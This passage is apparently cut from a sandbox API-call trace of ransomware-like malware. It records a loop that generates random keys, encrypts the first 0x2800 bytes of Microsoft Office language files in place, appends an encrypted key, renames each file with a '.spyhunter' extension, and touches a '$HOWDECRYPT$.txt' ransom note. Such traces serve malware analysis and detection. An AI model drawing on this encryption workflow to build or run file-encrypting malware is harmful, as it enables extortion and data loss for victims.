returned 0x0 [0145.726] GetProcessHeap () returned 0x2c0000 [0145.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.726] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cee34*=0x2800, lpOverlapped=0x0) returned 1 [0145.727] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.727] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cee34*=0x2800, lpOverlapped=0x0) returned 1 [0145.728] GetProcessHeap () returned 0x2c0000 [0145.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0145.728] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.728] WriteFile (in: hFile=0x178, lpBuffer=0x25cee74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee34, lpOverlapped=0x0 | out: lpBuffer=0x25cee74*, lpNumberOfBytesWritten=0x25cee34*=0x4, lpOverlapped=0x0) returned 1 [0145.740] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee34, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee34*=0x30, lpOverlapped=0x0) returned 1 [0145.740] CloseHandle (hObject=0x178) returned 1 [0145.740] GetProcessHeap () returned 0x2c0000 [0145.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.740] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.spyhunter") returned 87 [0145.740] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll.spyhunter")) returned 1 [0145.741] GetProcessHeap () returned 0x2c0000 [0145.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.741] GetProcessHeap () returned 0x2c0000 [0145.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.741] GetProcessHeap () returned 0x2c0000 [0145.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31570 | out: hHeap=0x2c0000) returned 1 [0145.741] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee70 | out: pbBuffer=0x25cee70) returned 1 [0145.741] GetProcessHeap () returned 0x2c0000 [0145.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.741] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee68*=0x30) returned 1 [0145.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.742] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned 76 [0145.742] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.742] GetProcessHeap () returned 0x2c0000 [0145.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.742] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cee2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.744] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.744] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cee2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.744] GetProcessHeap () returned 0x2c0000 [0145.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.744] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.744] WriteFile (in: hFile=0x178, lpBuffer=0x25cee6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee2c, lpOverlapped=0x0 | out: lpBuffer=0x25cee6c*, lpNumberOfBytesWritten=0x25cee2c*=0x4, lpOverlapped=0x0) returned 1 [0145.745] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee2c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee2c*=0x30, lpOverlapped=0x0) returned 1 [0145.745] CloseHandle (hObject=0x178) returned 1 [0145.745] GetProcessHeap () returned 0x2c0000 [0145.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.745] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.spyhunter") returned 86 [0145.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll.spyhunter")) returned 1 [0145.746] GetProcessHeap () returned 0x2c0000 [0145.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.746] GetProcessHeap () returned 0x2c0000 [0145.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.746] GetProcessHeap () returned 0x2c0000 [0145.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f313a0 | out: hHeap=0x2c0000) returned 1 [0145.746] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee70 | out: pbBuffer=0x25cee70) returned 1 [0145.746] GetProcessHeap () returned 0x2c0000 [0145.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.746] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee68*=0x30) returned 1 [0145.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.747] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned 75 [0145.747] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0145.747] GetProcessHeap () returned 0x2c0000 [0145.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.747] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cee2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.757] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.757] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cee2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.757] GetProcessHeap () returned 0x2c0000 [0145.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.757] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.757] WriteFile (in: hFile=0x178, lpBuffer=0x25cee6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee2c, lpOverlapped=0x0 | out: lpBuffer=0x25cee6c*, lpNumberOfBytesWritten=0x25cee2c*=0x4, lpOverlapped=0x0) returned 1 [0145.776] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee2c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee2c*=0x30, lpOverlapped=0x0) returned 1 [0145.776] CloseHandle (hObject=0x178) returned 1 [0145.776] GetProcessHeap () returned 0x2c0000 [0145.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.776] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.spyhunter") returned 85 [0145.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll.spyhunter")) returned 1 [0145.777] GetProcessHeap () returned 0x2c0000 [0145.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.777] GetProcessHeap () returned 0x2c0000 [0145.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.777] GetProcessHeap () returned 0x2c0000 [0145.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6cc8 | out: hHeap=0x2c0000) returned 1 [0145.777] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee68 | out: pbBuffer=0x25cee68) returned 1 [0145.777] GetProcessHeap () returned 0x2c0000 [0145.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee60*=0x30) returned 1 [0145.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.778] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned 77 [0145.778] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".txt") returned 0x0 [0145.778] GetProcessHeap () returned 0x2c0000 [0145.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0145.778] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cee24*=0x2800, lpOverlapped=0x0) returned 1 [0145.836] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.836] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cee24*=0x2800, lpOverlapped=0x0) returned 1 [0145.837] GetProcessHeap () returned 0x2c0000 [0145.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0145.837] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.837] WriteFile (in: hFile=0x178, lpBuffer=0x25cee64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee24, lpOverlapped=0x0 | out: lpBuffer=0x25cee64*, lpNumberOfBytesWritten=0x25cee24*=0x4, lpOverlapped=0x0) returned 1 [0145.846] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee24, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee24*=0x30, lpOverlapped=0x0) returned 1 [0145.846] CloseHandle (hObject=0x178) returned 1 [0145.846] GetProcessHeap () returned 0x2c0000 [0145.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.846] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.spyhunter") returned 87 [0145.847] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll.spyhunter")) returned 1 [0145.847] GetProcessHeap () returned 0x2c0000 [0145.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.847] GetProcessHeap () returned 0x2c0000 [0145.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.847] GetProcessHeap () returned 0x2c0000 [0145.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f312b8 | out: hHeap=0x2c0000) returned 1 [0145.847] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee68 | out: pbBuffer=0x25cee68) returned 1 [0145.848] GetProcessHeap () returned 0x2c0000 [0145.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.848] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee60*=0x30) returned 1 [0145.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.849] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned 74 [0145.849] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.849] GetProcessHeap () returned 0x2c0000 [0145.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0145.849] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cee24*=0x2800, lpOverlapped=0x0) returned 1 [0145.951] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.951] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cee24*=0x2800, lpOverlapped=0x0) returned 1 [0145.952] GetProcessHeap () returned 0x2c0000 [0145.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0145.952] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.952] WriteFile (in: hFile=0x178, lpBuffer=0x25cee64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee24, lpOverlapped=0x0 | out: lpBuffer=0x25cee64*, lpNumberOfBytesWritten=0x25cee24*=0x4, lpOverlapped=0x0) returned 1 [0146.128] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee24, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee24*=0x30, lpOverlapped=0x0) returned 1 [0146.128] CloseHandle (hObject=0x178) returned 1 [0146.128] GetProcessHeap () returned 0x2c0000 [0146.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.128] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.spyhunter") returned 84 [0146.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll.spyhunter")) returned 1 [0146.129] GetProcessHeap () returned 0x2c0000 [0146.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.129] GetProcessHeap () returned 0x2c0000 [0146.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.130] GetProcessHeap () returned 0x2c0000 [0146.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6948 | out: hHeap=0x2c0000) returned 1 [0146.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.130] GetProcessHeap () returned 0x2c0000 [0146.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff65c8 | out: hHeap=0x2c0000) returned 1 [0146.130] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee60 | out: pbBuffer=0x25cee60) returned 1 [0146.130] GetProcessHeap () returned 0x2c0000 [0146.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.130] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee58*=0x30) returned 1 [0146.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0146.131] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned 75 [0146.131] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.131] GetProcessHeap () returned 0x2c0000 [0146.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0146.131] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cee1c*=0x2800, lpOverlapped=0x0) returned 1 [0146.186] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.186] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cee1c*=0x2800, lpOverlapped=0x0) returned 1 [0146.186] GetProcessHeap () returned 0x2c0000 [0146.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0146.186] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.186] WriteFile (in: hFile=0x178, lpBuffer=0x25cee5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee1c, lpOverlapped=0x0 | out: lpBuffer=0x25cee5c*, lpNumberOfBytesWritten=0x25cee1c*=0x4, lpOverlapped=0x0) returned 1 [0146.188] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee1c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee1c*=0x30, lpOverlapped=0x0) returned 1 [0146.188] CloseHandle (hObject=0x178) returned 1 [0146.188] GetProcessHeap () returned 0x2c0000 [0146.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.188] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.spyhunter") returned 85 [0146.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll.spyhunter")) returned 1 [0146.188] GetProcessHeap () returned 0x2c0000 [0146.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.188] GetProcessHeap () returned 0x2c0000 [0146.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.189] GetProcessHeap () returned 0x2c0000 [0146.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff64e8 | out: hHeap=0x2c0000) returned 1 [0146.189] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee58 | out: pbBuffer=0x25cee58) returned 1 [0146.189] GetProcessHeap () returned 0x2c0000 [0146.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.189] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee50*=0x30) returned 1 [0146.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0146.189] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned 76 [0146.189] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.189] GetProcessHeap () returned 0x2c0000 [0146.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0146.189] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cee14*=0x2800, lpOverlapped=0x0) returned 1 [0146.191] SetFilePointerEx (in: 